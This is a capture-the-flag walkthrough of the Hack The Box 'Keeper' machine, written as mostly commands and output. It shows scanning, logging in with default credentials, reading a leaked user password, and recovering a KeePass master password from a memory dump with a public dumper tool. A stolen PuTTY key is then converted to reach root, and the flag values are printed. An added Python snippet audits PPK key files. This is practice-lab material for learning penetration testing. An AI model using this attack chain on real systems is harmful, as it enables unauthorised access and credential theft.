=========================================================================================
| 1. Port scanning |
=========================================================================================
# The target is blocking nmap's ping probes
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -A 10.10.11.227 -T5
----------------------------------------------------------------------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 08:39 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.47 seconds
----------------------------------------------------------------------------------
# -Pn : skip host discovery and scan without ping probes (treat the host as up)
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn 10.10.11.227 -T5
----------------------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
----------------------
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn -A 10.10.11.227 -T5 -p 22,80 -oA keeper_ps
-----------------------------------------------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
-----------------------------------------------------------------------------------
=========================================================================================
| 2. Web page assessment |
=========================================================================================
# Opening 'http://10.10.11.227' in Firefox fails: the site redirects to a *.keeper.* domain that does not resolve
--------------------------------------------------------
firefox : 'http://10.10.11.227' error
--------------------------------------------------------
# Map the IP address to the domain names in /etc/hosts.
# Once the *.keeper.* domains resolve to the target (10.10.11.227), the site loads.
┌──(kali㉿kali)-[~/keeper]
└─$ cat /etc/hosts
-----------------------------------
10.10.11.227 tickets.keeper.htb
10.10.11.227 keeper.htb
-----------------------------------
# The site shows a login page that still accepts the default username and password
---------------------------------------------------
Login 4.4.4+dfsg-2ubuntu1
---------------------------------------------------
Username : root
Password : password
---------------------------------------------------
Login
---------------------------------------------------
# In the top menu, 'Admin - Users' stands out
# There are 'lnorgaard' and 'root' accounts; the 'lnorgaard' entry reveals the password 'Welcome2023!'.
==========================================================================================
| 3. guest account access |
==========================================================================================
# Log in to the target with the 'lnorgaard' account
┌──(kali㉿kali)-[~/keeper]
└─$ ssh lnorgaard@10.10.11.227
# The user.txt flag is in the home directory
lnorgaard@keeper:~$ ls -alh
--------------------------------------------------------------
-rw-r----- 1 root lnorgaard 33 Feb 7 11:22 user.txt
-rw-r--r-- 1 root root 84M Feb 7 14:58 RT30000.zip
--------------------------------------------------------------
lnorgaard@keeper:~$ cat user.txt
---------------------------------
dfd647a85990780c39e000c082cd728a
---------------------------------
===========================================================================================
| 4. RT30000.zip analysis |
===========================================================================================
# The 84MB RT30000.zip file stands out
--------------------------------------------------------------
-rw-r--r-- 1 root root 84M Feb 7 14:58 RT30000.zip
--------------------------------------------------------------
# Pull RT30000.zip from the target (lnorgaard@10.10.11.227) to the attacker box (kali), since tooling is hard to use on the remote host
# scp stalls at 32%, probably because of the file size
┌──(kali㉿kali)-[~/keeper]
└─$ rsync -avz -e ssh lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
┌──(kali㉿kali)-[~/keeper]
└─$ unzip RT30000.zip
---------------------------------
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
---------------------------------
=====================================================================================================
| 4-1. KeePassDumpFull.dmp analysis |
=====================================================================================================
# Install 'keepassxc' to open 'passcodes.kdbx'
# Application => run keepassxc => Database (top menu) => Open Database => 'passcodes.kdbx'
# But it asks for a password
┌──(kali㉿kali)-[~/keeper]
└─$ sudo apt-get install keepassxc
# The plan is to extract the 'passcodes.kdbx' master password from KeePassDumpFull.dmp
# KeePass Master Password Dumper is a simple proof-of-concept tool for recovering the master password from KeePass's memory
┌──(kali㉿kali)-[~/keeper]
└─$ wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
┌──(kali㉿kali)-[~/keeper]
└─$ sudo dpkg -i packages-microsoft-prod.deb
┌──(kali㉿kali)-[~/keeper]
└─$ sudo apt-get install -y apt-transport-https
┌──(kali㉿kali)-[~/keeper]
└─$ sudo apt-get install -y dotnet-sdk-7.0
┌──(kali㉿kali)-[~/keeper]
└─$ dotnet --version
┌──(kali㉿kali)-[~/keeper]
└─$ git clone https://github.com/vdohney/keepass-password-dumper
┌──(kali㉿kali)-[~/keeper]
└─$ cd keepass-password-dumper
┌──(kali㉿kali)-[~/keeper/keepass-password-dumper]
└─$ dotnet run KeePassDumpFull.dmp
-------------------------------------------------------------------------------
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
-------------------------------------------------------------------------------
# Googling 'M}dgrød med fløde' corrects it to 'rødgrød med fløde', a Danish dessert.
--------------------------------------------------------
Google : 'M}dgrød med fløde' => 'rødgrød med fløde'
--------------------------------------------------------
===================================================================================================================
| 4-2. passcodes.kdbx login and root account access |
===================================================================================================================
# Again: Application => run keepassxc => Database (top menu) => Open Database => 'passcodes.kdbx'
# Enter the password 'rødgrød med fløde'
# Click Network in the left menu, then root, to see the 'root' password 'F4><3K0nd!'
# SSH login with that password fails
┌──(kali㉿kali)-[~/keeper]
└─$ ssh root@10.10.11.227
------------------------------------
root@10.10.11.227's password:
Permission denied, please try again.
------------------------------------
# Check the Notes.
# The Notes hold a PuTTY private key (.PPK).
# So it has to be converted to a private key format that OpenSSH supports.
------------------------------------------------------------------------------
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
------------------------------------------------------------------------------
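The note above is as sensitive as a password because the key is stored with 'Encryption: none'. Here is an added Python example (not part of the original write-up or of any tool it uses) that parses the PPK version-3 layout shown above and reports the algorithm, whether the private part has a passphrase, and whether an integrity MAC is present; the PPK it parses is a constructed sample, not the key from the box.

```python
import base64
import struct

def _wire_string(data: bytes) -> bytes:
    # SSH wire-format string: 4-byte big-endian length, then the bytes
    return struct.pack(">I", len(data)) + data

# Constructed sample in the PPK version-3 layout seen in the database notes. The
# public blob is a real SSH-wire encoding of a throwaway RSA key (e=65537, a tiny
# placeholder modulus); the private line and MAC are dummy values, not key material.
_PUBLIC_BLOB = base64.b64encode(
    _wire_string(b"ssh-rsa") + _wire_string(b"\x01\x00\x01") + _wire_string(b"\x00\xc3")
).decode()
SAMPLE_PPK = "\n".join([
    "PuTTY-User-Key-File-3: ssh-rsa",
    "Encryption: none",
    "Comment: rsa-key-20230519",
    "Public-Lines: 1",
    _PUBLIC_BLOB,
    "Private-Lines: 1",
    "AAAA" * 16,
    "Private-MAC: " + "00" * 32,
])

def parse_ppk(text: str) -> dict:
    """Header fields keyed by name; each base64 section is joined under its count header."""
    lines, fields, i = text.splitlines(), {}, 0
    while i < len(lines):
        key, _, value = lines[i].partition(": ")
        i += 1
        if key in ("Public-Lines", "Private-Lines"):
            count = int(value)
            fields[key] = "".join(lines[i:i + count])
            i += count
        else:
            fields[key] = value
    return fields

def audit_ppk(text: str) -> dict:
    """What a reviewer of a stored key wants to know: algorithm, passphrase, integrity MAC."""
    fields = parse_ppk(text)
    raw = base64.b64decode(fields["Public-Lines"])
    (length,) = struct.unpack(">I", raw[:4])       # first wire string names the algorithm
    algorithm = raw[4:4 + length].decode()
    return {
        "algorithm": algorithm,
        "header_matches_blob": fields["PuTTY-User-Key-File-3"] == algorithm,
        "comment": fields.get("Comment", ""),
        "encrypted": fields.get("Encryption", "none") != "none",   # 'none': whoever reads the note owns the key
        "has_mac": "Private-MAC" in fields,
    }
```

Run audit_ppk over any PPK text copied out of a password-manager note; an 'encrypted' value of False is the finding to act on (rotate the key, and keep private keys out of free-text notes).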
# Copy and paste the Notes into 'putty_private_key.ppk'
┌──(kali㉿kali)-[~/keeper]
└─$ sudo mousepad putty_private_key.ppk
# Convert 'putty_private_key.ppk' to 'private-openssh' format, saved as 'openssh_private_key'
┌──(kali㉿kali)-[~/keeper]
└─$ puttygen putty_private_key.ppk -O private-openssh -o openssh_private_key
# Connect to root@10.10.11.227 with 'openssh_private_key'
┌──(kali㉿kali)-[~/keeper]
└─$ ssh -i openssh_private_key root@10.10.11.227
root@keeper:~# id
--------------------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------
root@keeper:~# ls -alh
--------------------------------------------------
-rw-r----- 1 root root 33 Feb 8 07:26 root.txt
--------------------------------------------------
root@keeper:~# cat root.txt
---------------------------------
0d232ade59997522256769bc91656bfc
---------------------------------